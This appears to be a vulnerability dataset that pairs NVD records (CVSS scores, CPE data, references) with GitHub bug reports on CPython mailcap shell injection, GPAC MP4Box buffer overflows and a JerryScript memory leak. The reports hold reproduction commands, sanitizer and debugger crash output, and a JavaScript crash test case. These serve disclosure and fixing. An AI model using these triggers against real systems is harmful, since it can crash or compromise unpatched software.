"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6QIKVSW3H6W2GQGDE5DTIWLGFNH6KKEW/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AKGMYDVKI3XNM27B6I6RQ6QV3TVJAUCG/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ERYMM2QVDPOJLX4LYXWYIQN5FOIJLDRY/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/F3LNY2NHM6J22O6Q5ANOE3SZRK3OACKR/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FCIO2W4DUVVMI6L52QCC4TT2B3K5VWHS/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FIRUTX47BJD2HYJDLMI7JJBVCYFAPKAQ/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GPCLGZZJPVXFWUWVV5WCD5FNUAFLKBDN/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HAI2GBC7WKH7J5NH6J2IW5RT3VF2SF5M/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IFGV7P2PYFBMK32OKHCAC2ZPJQV5AUDF/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KAY6VBNVEFUXKJF37WFHYXUSRDEK34N3/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MYG3EMFR7ZHC46TDNM7SNWO64A3W7EUF/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ONXSGLASNLGFL57YU6WT6Y5YURSFV43U/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PTTZGLD2YBMMG6U6F5HOTPOGGPBIURMA/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UIOJUZ5JMEMGSKNISTOVI4PDP36FDL5Y/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/W5664BGZVTA46LQDNTYX5THG6CN4FYJX/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WXF6MQ74HVIDDSR5AE2UDR24I6D4FEPC/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XO2H6CKWLRGTTZCGUQVELW6LUH437Q3O/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Y4E2WBEJ42CGLGDHD6ZXOLZ2W6G3YOVD/" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://python-security.readthedocs.io/vuln/mailcap-shell-injection.html" }, { "source": "[email protected]", "tags": null, "url": "https://security.gentoo.org/glsa/202305-02" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220616-0001/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "matchCriteriaId": "16A21965-681C-4815-94DA-5B8EBC5EDA68", "versionEndExcluding": null, "versionEndIncluding": "3.7.15", "versionStartExcluding": null, "versionStartIncluding": "3.7.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "matchCriteriaId": "9E43ADF1-EABE-45A4-96BE-F1E018ADAEE3", "versionEndExcluding": null, "versionEndIncluding": "3.8.15", "versionStartExcluding": null, "versionStartIncluding": "3.8.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "matchCriteriaId": "0FB09E1E-A9D2-494E-9481-1BBA00D3CFEC", "versionEndExcluding": null, "versionEndIncluding": "3.9.15", "versionStartExcluding": null, "versionStartIncluding": "3.9.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "matchCriteriaId": "6D188C6C-7AB9-4554-8E0F-46052E9F4D5E", "versionEndExcluding": "3.10.8", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.10.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*", "matchCriteriaId": "3A756737-1CC4-42C2-A4DF-E1C893B4E2D5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:*", "matchCriteriaId": "B55E8D50-99B4-47EC-86F9-699B67D473CE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:ontap_select_deploy_administration_utility:-:*:*:*:*:*:*:*", "matchCriteriaId": "E7CF3019-975D-40BB-A8A4-894E62BD3797", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*", "matchCriteriaId": "BDFB1169-41A0-4A86-8E4F-FDA9730B1E94", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*", "matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/python/cpython/issues/68966
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "python", "cpython" ]
BPO | [24778](https://bugs.python.org/issue24778) --- | :--- Nosy | @vstinner, @bitdancer Files | <li>[screenshot.png](https://bugs.python.org/file40099/screenshot.png "Uploaded as image/png at 2015-08-02.08:25:06 by TheRegRunner")</li><li>[The Quote Problem.py](https://bugs.python.org/file40116/The%20Quote%20Problem.py "Uploaded as text/plain at 2015-08-03.19:27:35 by TheRegRunner")</li><li>[mailcap patch.zip](https://bugs.python.org/file40897/mailcap%20patch.zip "Uploaded as application/zip at 2015-10-29.19:26:36 by TheRegRunner"): mailcap.py patches and diffs for python2.7 and python 3.5</li> <sup>*Note: these values reflect the state of the issue at the time it was migrated and might not reflect the current state.*</sup> <details><summary>Show more details</summary><p> GitHub fields: ```python assignee = None closed_at = None created_at = <Date 2015-08-02.08:25:07.171> labels = ['type-security', '3.11', 'library', 'docs'] title = 'mailcap.findmatch: document shell command Injection danger in filename parameter' updated_at = <Date 2022-04-06.15:30:37.106> user = 'https://bugs.python.org/TheRegRunner' ``` bugs.python.org fields: ```python activity = <Date 2022-04-06.15:30:37.106> actor = 'vstinner' assignee = 'docs@python' closed = False closed_date = None closer = None components = ['Documentation', 'Library (Lib)'] creation = <Date 2015-08-02.08:25:07.171> creator = 'TheRegRunner' dependencies = [] files = ['40099', '40116', '40897'] hgrepos = [] issue_num = 24778 keywords = [] message_count = 14.0 messages = ['247857', '247861', '247944', '247946', '247951', '247979', '247992', '248058', '248061', '248062', '248070', '248074', '253689', '416878'] nosy_count = 4.0 nosy_names = ['vstinner', 'r.david.murray', 'docs@python', 'TheRegRunner'] pr_nums = [] priority = 'normal' resolution = None stage = None status = 'open' superseder = None type = 'security' url = 'https://bugs.python.org/issue24778' versions = ['Python 3.11'] ``` </p></details> <!-- gh-linked-prs --> ### Linked PRs * gh-105298 * gh-105299 * gh-105300 <!-- /gh-linked-prs -->
[CVE-2015-20107] mailcap.findmatch: document shell command Injection danger in filename parameter
https://api.github.com/repos/python/cpython/issues/68966/comments
55
2015-08-02T08:25:07Z
2023-06-05T03:40:08Z
https://github.com/python/cpython/issues/68966
1,198,939,118
68,966
CVE-2022-29537
2022-04-20T23:15:08.777
gp_rtp_builder_do_hevc in ietf/rtp_pck_mpeg4.c in GPAC 2.0.0 has a heap-based buffer over-read, as demonstrated by MP4Box.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2173" }, { "source": "[email protected]", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D7AEE044-50E9-4230-B492-A5FF18653115", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2173
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ ## Describe the bug There is a heap-overflow bug in gp_rtp_builder_do_hevc, can be triggered via MP4Box+ ASan ## Step to reproduce ./configure --enable-sanitizer && make -j$(nproc) ./MP4Box -hint -out /dev/null poc ## Sanitizer output ``` [iso file] Box "hvcC" (start 919) has 26 extra bytes Hinting track ID 1 - Type "hvc1:hvc1" (H265) - BW 3 kbps [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 191 but only 3 bytes left in sample 11 [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it [rtp hinter] Broken AVC nalu encapsulation: NALU size is 0, ignoring it ================================================================= ==2628578==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000001f15 at pc 0x7f14c2411bf5 bp 0x7ffec49a0110 sp 0x7ffec49a0100 READ of size 1 at 0x602000001f15 thread T0 #0 0x7f14c2411bf4 in gp_rtp_builder_do_hevc ietf/rtp_pck_mpeg4.c:594 #1 0x7f14c29c1da6 in gf_hinter_track_process media_tools/isom_hinter.c:834 #2 0x561e3a6f0d97 in HintFile /home/hzheng/real-validate/gpac/applications/mp4box/main.c:3613 #3 0x561e3a6f857b in mp4boxMain /home/hzheng/real-validate/gpac/applications/mp4box/main.c:6481 #4 0x7f14bfb8b0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #5 0x561e3a6d0aed in _start (/home/hzheng/real-validate/gpac/bin/gcc/MP4Box+0xa9aed) 0x602000001f15 is located 0 bytes to the right of 5-byte region [0x602000001f10,0x602000001f15) allocated by thread T0 here: #0 0x7f14c58d9bc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8) #1 0x7f14c268782d in Media_GetSample isomedia/media.c:623 #2 0x7f14c25e6e5c in gf_isom_get_sample_ex isomedia/isom_read.c:1905 #3 0x7f14c29c16bd in gf_hinter_track_process media_tools/isom_hinter.c:756 #4 0x561e3a6f0d97 in HintFile /home/hzheng/real-validate/gpac/applications/mp4box/main.c:3613 #5 0x561e3a6f857b in mp4boxMain /home/hzheng/real-validate/gpac/applications/mp4box/main.c:6481 #6 0x7f14bfb8b0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: heap-buffer-overflow ietf/rtp_pck_mpeg4.c:594 in gp_rtp_builder_do_hevc Shadow bytes around the buggy address: 0x0c047fff8390: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff83a0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff83b0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff83c0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff83d0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 =>0x0c047fff83e0: fa fa[05]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff83f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2628578==ABORTING ``` ## version system: ubuntu 20.04.3 LTS compiler: gcc 9.3.0 gpac version: latest commit 6dcba5347cd12372225fc47080bc6e770fc4bb1b ``` MP4Box - GPAC version 2.1-DEV-rev114-g6dcba5347-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` ## Credit Han Zheng [NCNIPC of China](http://www.nipc.org.cn) [Hexhive](http://hexhive.epfl.ch/) ## POC [crash.zip](https://github.com/gpac/gpac/files/8499508/crash.zip)
[BUG] heap buffer overflow in gp_rtp_builder_do_hevc
https://api.github.com/repos/gpac/gpac/issues/2173/comments
0
2022-04-16T08:01:38Z
2022-08-03T09:45:02Z
https://github.com/gpac/gpac/issues/2173
1,206,048,984
2,173
CVE-2022-1441
2022-04-25T17:15:36.547
MP4Box is a component of GPAC-2.0.0, which is a widely-used third-party package on RPM Fusion. When MP4Box tries to parse a MP4 file, it calls the function `diST_box_read()` to read from video. In this function, it allocates a buffer `str` with fixed length. However, content read from `bs` is controllable by user, so is the length, which causes a buffer overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/3dbe11b37d65c8472faf0654410068e5500b3adb" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2175" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D7AEE044-50E9-4230-B492-A5FF18653115", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2175
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
# Description When GPAC tries to parse a MP4 file, it calls the function `diST_box_read()` to read from video. In this funtion, it allocates a buffer `str` with fixed length. However, content read from `bs` is controllable by user, so is the length, which causes a buffer overflow. ``` char str[1024]; i=0; str[0]=0; while (1) { str[i] = gf_bs_read_u8(bs); if (!str[i]) break; i++; } ``` # Impact Since video content is absolutely controllable by users, an unlimited length will cause stack overflow, corrupting canary or even get shell. # Mitigation We can just set a length limit to it, making it less than 1024 byte. See pull request https://github.com/gpac/gpac/pull/2174 . # Reproduce On Ubuntu 2004, make with this. ``` ./configure --static-bin make ``` Run the following command with POC.mp4. ``` $ MP4Box -info ./POC.mp4 ``` You may get a stack smashing detectde error, which indicates that CANARY is crashed. ``` [BS] Attempt to overread bitstream *** stack smashing detected ***: terminated Aborted ``` GDB ``` *** stack smashing detected ***: terminated Program received signal SIGABRT, Aborted. 0x0000000000aa31eb in raise () pwndbg> bt #0 diST_box_read (s=0xdf4b00, bs=0xdf71e0) at isomedia/box_code_3gpp.c:1130 #1 0x000000000052e8c9 in gf_isom_box_read (bs=0xdf71e0, a=0xdf4b00) at isomedia/box_funcs.c:1832 #2 gf_isom_box_parse_ex (outBox=outBox@entry=0x7fffffff8540, bs=<optimized out>, bs@entry=0xdf71e0, parent_type=parent_type@entry=0, is_root_box=is_root_box@entry=GF_TRUE) at isomedia/box_funcs.c:264 #3 0x000000000052f070 in gf_isom_parse_root_box (outBox=outBox@entry=0x7fffffff8540, bs=0xdf71e0, box_type=box_type@entry=0x0, bytesExpected=bytesExpected@entry=0x7fffffff8590, progressive_mode=progressive_mode@entry=GF_FALSE) at isomedia/box_funcs.c:38 #4 0x0000000000536af8 in gf_isom_parse_movie_boxes_internal (mov=mov@entry=0xdf6fc0, boxType=boxType@entry=0x0, bytesMissing=bytesMissing@entry=0x7fffffff8590, progressive_mode=progressive_mode@entry=GF_FALSE) at isomedia/isom_intern.c:373 #5 0x0000000000538287 in gf_isom_parse_movie_boxes (progressive_mode=GF_FALSE, bytesMissing=0x7fffffff8590, boxType=0x0, mov=0xdf6fc0) at isomedia/isom_intern.c:852 #6 gf_isom_open_file (fileName=0x7fffffffe67d "../../../../crashes/1.mp4", OpenMode=<optimized out>, tmp_dir=0x0) at isomedia/isom_intern.c:972 #7 0x0000000000414dd4 in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at main.c:5968 #8 0x0000000000a94000 in __libc_start_main () #9 0x0000000000402e6e in _start () at main.c:6585 ``` # Credits xdchase # POC [POC.zip](https://github.com/gpac/gpac/files/8499537/POC.zip)
GPAC-2.0.0 MP4Box: stack overflow with unlimited length and controllable content in diST_box_read
https://api.github.com/repos/gpac/gpac/issues/2175/comments
1
2022-04-16T08:21:46Z
2022-04-22T18:29:03Z
https://github.com/gpac/gpac/issues/2175
1,206,053,267
2,175
CVE-2021-41959
2022-05-03T11:15:07.130
JerryScript Git version 14ff5bf does not sufficiently track and release allocated memory via jerry-core/ecma/operations/ecma-regexp-object.c after RegExp, which causes a memory leak.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4781" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/pull/4787" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:-:*:*:*:*:*:*:*", "matchCriteriaId": "4EB495C8-348F-4B04-B31F-1F4EE471CC22", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/4781
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision 14ff5bf ###### Build platform Ubuntu 20.04.3 LTS (Linux 5.11.0-34-generic x86_64) ###### Build steps ```sh ./tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \ --clean --debug --strip=off --logging=on --error-messages=on \ --compile-flag=-fsanitize=address --stack-limit=20 ``` ###### Test case ```javascript function testAdvanceStringIndex(lastIndex) { let exec_count = 0; let last_last_index = -1; let fake_re = { exec: () => { return exec_count++ == 0 ? [""] : null; }, get lastIndex() { return lastIndex; }, set lastIndex(value) { }, get global() { return true; } }; RegExp.prototype[Symbol.match].call(fake_re, "abc"); } testAdvanceStringIndex(0x7ffffff); ``` ###### Output ```sh ICE: Assertion 'JERRY_CONTEXT (jmem_heap_allocated_size) == 0' failed at /jerryscript/jerry-core/jmem/jmem-heap.c(jmem_heap_finalize):107. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) ``` ###### Backtrace ```sh #0 __GI_raise (sig=sig@entry=6) at 